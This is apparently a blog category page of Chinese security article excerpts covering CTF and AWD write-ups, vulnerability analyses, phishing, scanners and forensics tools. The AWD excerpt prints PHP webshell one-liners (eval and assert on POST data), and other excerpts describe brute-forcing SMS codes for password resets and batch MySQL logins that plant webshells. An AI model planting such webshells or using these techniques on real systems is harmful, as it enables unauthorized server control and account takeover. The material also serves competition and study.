信息安全
文章平均质量分 84
Blus.King
道阻且长,行则将至
展开
-
开源资产/漏洞管理平台使用测评
对几款开源资产/漏洞管理平台的简单测评。TideSec/Mars Mars(战神)——资产发现、子域名枚举、C段扫描、资产变更监测、端口变更监测、域名解析变更监测、Awvs扫描、POC检测、web指纹探测、端口指纹探测、CDN探测、操作系统指纹探测、泛解析探测、WAF探测、敏感信息检测等等!地址 https://github.com/TideSec/Mars使用命令# docker run --name tide-mars -p 5000:5000原创 2021-03-01 15:43:13 · 9061 阅读 · 6 评论 -
volatility2各类外部插件使用简介
插件使用方式:1.把插件文件放入volatility的plugins中2.使用--plugins参数指定插件目录官方-社区插件项目https://github.com/volatilityfoundation/community注意:1.如果使用出错,可以打开插件文件或者单独运行,可能是有些库没有安装2.官方虽然提供了一个社区插件的整合仓库,却没有给出详细说明。文件夹名称是插件制作者的姓名,文件夹内才是插件真正的名称。下面挑一部分进行说明。mimaka...原创 2020-12-10 16:50:35 · 5377 阅读 · 0 评论 -
先知社区-文章爬虫-python脚本
说明· 先知社区文章爬虫,保存成pdf文件· 自己是在win10上跑的,没太考虑其他系统。windows应该可以直接跑,其他系统需提前安装wkhtmltopdf,然后在代码里修改路径。path_wk = r'.\wkhtmltopdf\bin\wkhtmltopdf.exe'· 采用的是逆序,从最新文章开始保存。需手动在代码里,8590位置处,填写最新一篇文章的页码。 for i in range(8590,0,-1): #逆序循环爬取,注意这里要添加最新文章的页码 https:原创 2020-12-07 10:54:26 · 3331 阅读 · 10 评论 -
2020湖湘杯MISC全解-writeup
MISC1导出index-demo.html,查看代码发现隐藏了一长串base64使用base64隐写进行解密key:"lorrie"得到key说明可能存在某种隐写,是snow隐写,但用网页版的snow隐写解出来是一串乱码,于是尝试使用本地版的SNOW.EXESNOW.EXE -p lorrie index-demo.htmlflag{→_→←_←←_←←_←←_← →_→→_→←_←←_←←_← →_→←_←←_←←_← ←_←←_←←_←→_→→...原创 2020-11-02 18:40:03 · 4619 阅读 · 15 评论 -
通达OA 漏洞分析
漏洞通报信息:https://mp.weixin.qq.com/s/_bpg8buT92dzRuGdr2ZrRghttps://mp.weixin.qq.com/s/s1yqJNOsCk-uVyCtg6SG7AOA-2017非官网:http://www.downxia.com/downinfo/202980.html最新版v11下载地址:http://www.tongda20...原创 2020-03-19 15:49:36 · 9628 阅读 · 1 评论 -
从无到有分析thinkphp6 session文件操作漏洞
漏洞介绍: 2020年1月10日,ThinkPHP团队发布一个补丁更新,修复了一处由不安全的SessionId导致的任意文件操作漏洞。该漏洞允许攻击者在目标环境启用session的条件下创建任意文件以及删除任意文件,在特定情况下还可以getshell。该漏洞已经有分析文章:https://mp.weixin.qq.com/s/UPu6cE20l24T6fkYOlSUJw 但分析...原创 2020-02-16 16:57:43 · 1648 阅读 · 0 评论 -
抖音·某无关痛痒的信息泄露接口
以前的老稿子,发现是私密状态。 重新发布一下,做个记录。---------------------当初的正文-------------------------------------------------------------------------------------------------------------------版本:3.7.0(测试时最新)起...原创 2020-02-09 23:08:05 · 1526 阅读 · 1 评论 -
红队攻击:轻松玩转邮件钓鱼
首发在合天智汇:https://mp.weixin.qq.com/s/sRXnwIdy3eQ0CJS58_bI1g 邮件钓鱼老生常谈,攻击手段也并不新颖。但对于网络安全工程师来说,“懂原理”和“会使用”是两个概念。会用,用得好不好,又是不同的层次。红队攻击要讲究攻击的效率,人力投入的性价比,以及能获得的数据结果的重要性。钓鱼攻击原理不难,但找到可用性高的框架或平台难。网上的钓鱼平台...原创 2020-01-15 14:41:56 · 3133 阅读 · 1 评论 -
自制Python后台目录扫描器
以前用御剑扫描,但经常会出现bug,不抓流量还不一定能发现,结果可信度不高。当然也可以偷懒使用burpsuite之类的intruder功能来充当扫描器。但为了更好的掌控扫描的情况,就自己写了个python扫描器。代码如下:#!/usr/bin/env python# encoding: utf-8import requestsimport threadingimpo...原创 2019-05-28 17:35:16 · 994 阅读 · 0 评论 -
一条命令完成snort安装
跟安装docker一样不需要像网上那么麻烦,直接apt就行。Ubuntu16.04安装snort:sudo apt install snort原创 2019-05-20 14:14:20 · 330 阅读 · 0 评论 -
安恒月赛WriteUp-2018.12
安恒月赛WriteUp2018-12月 WEB1-easy:web1反序列化 一打开就显示了源代码: <?php @error_reporting(1);include 'flag.php';class baby{ public $file; function __toString() { ...原创 2018-12-22 22:24:51 · 2908 阅读 · 0 评论 -
对shopex电商网站的渗透
快毕业了,最近在整理大学四年的相关知识,发现原来两年前的自己比现在有劲头。两年前对shopex网站进行了测试,有好几处漏洞。整理时发现了当时的记录文档,可能过程不够详细,只讲了大概的思路。 相关知识点: 验证码爆破 XSS拿cookie 社会工程学 Sql二阶注入 一.好了,开始。二话不说先注册一个账号. 登录后提示可...原创 2018-12-11 11:32:38 · 1246 阅读 · 0 评论 -
利用burpsuite挖掘教育系统通用密码重置漏洞的详细过程
利用burpsuite挖掘教育系统通用密码重置漏洞的详细过程 北京万学教育科技有限公司旗下的教育系统可绕过手机验证,涉及多个教育平台。导致黑客可以重置任意用户密码来登录任意账户。账户后台存在部分个人信息,同时能进行着交易支付,造成了进一步的危害。(该漏洞一年前已修复). 漏洞成因:没有对手机验证码的验证次数做限制,而且验证码长度只有四位,使黑客可以通过爆破手段绕过一切需要手机验...原创 2018-12-11 09:39:15 · 3067 阅读 · 4 评论 -
CTF中压缩包解密的几种常见方式
压缩包解密通用方法:1.用winhex打开,搜索字符pass 、 key 等,查看是否有含有压缩包密码2.如果要爆破: 先0-6位数字来一遍3.如果爆破不成功可以根据题意或者社工 猜密码组合。例如某用户名叫王方,密码就有可能是wangfang123. crc32爆破:压缩包压缩文件会附带crc32校验码,如果字节长度比较短的话,可以尝试crc32爆破。比方说...原创 2018-12-10 19:22:58 · 45948 阅读 · 2 评论 -
数据流量包-Python辅助分析脚本
流量包往往大而繁杂,所以编写了该Python脚本辅助。需用Linux环境,因为调用了Tcpdump。将该脚本放入pcap数据包的目录中运行,可以输入1-4。1可以批量改名,3批量过滤,4将包合成 2可以在过滤后自动将过滤出的包合成。在过滤选项中也有几个选择,1只过滤http流量,2只过滤ftp流量,3.同时过滤http和ftp流量,4自定义过滤,填tcpdump的语句。...原创 2018-12-10 18:43:17 · 1755 阅读 · 2 评论 -
AWD模式下的各类PHP木马
经典一句话木马最最常见的PHP木马,经典,但也满足不了我们的需求,很容易被大佬识破<?php @eval($_POST["cmd"]); ?><?php@assert($_POST['cmd']);?>混淆马:让木马内容难以识别<?php assert($_POST[-7]); ?> 变换成<?php ...原创 2019-04-19 17:09:29 · 5291 阅读 · 1 评论 -
AWD下-MySql漏洞批量利用脚本
这个脚本最开始的构思是在AWD比赛的情景下,因为所有服务器的环境都相同,只要查看本地的MySql用户名密码就知道了所有服务器的MySql用户名密码。若服务器开放了3306端口,那么利用这一个漏洞就能顺利获得所有服务器权限。有备无患,于是就写了这个Mysql批量连接写小马的脚本。以下是最初的脚本(python2),当然后来又更新换代加了骚思路,过一段时间会放出...... 需要安装mysq...原创 2018-12-09 21:20:02 · 1649 阅读 · 0 评论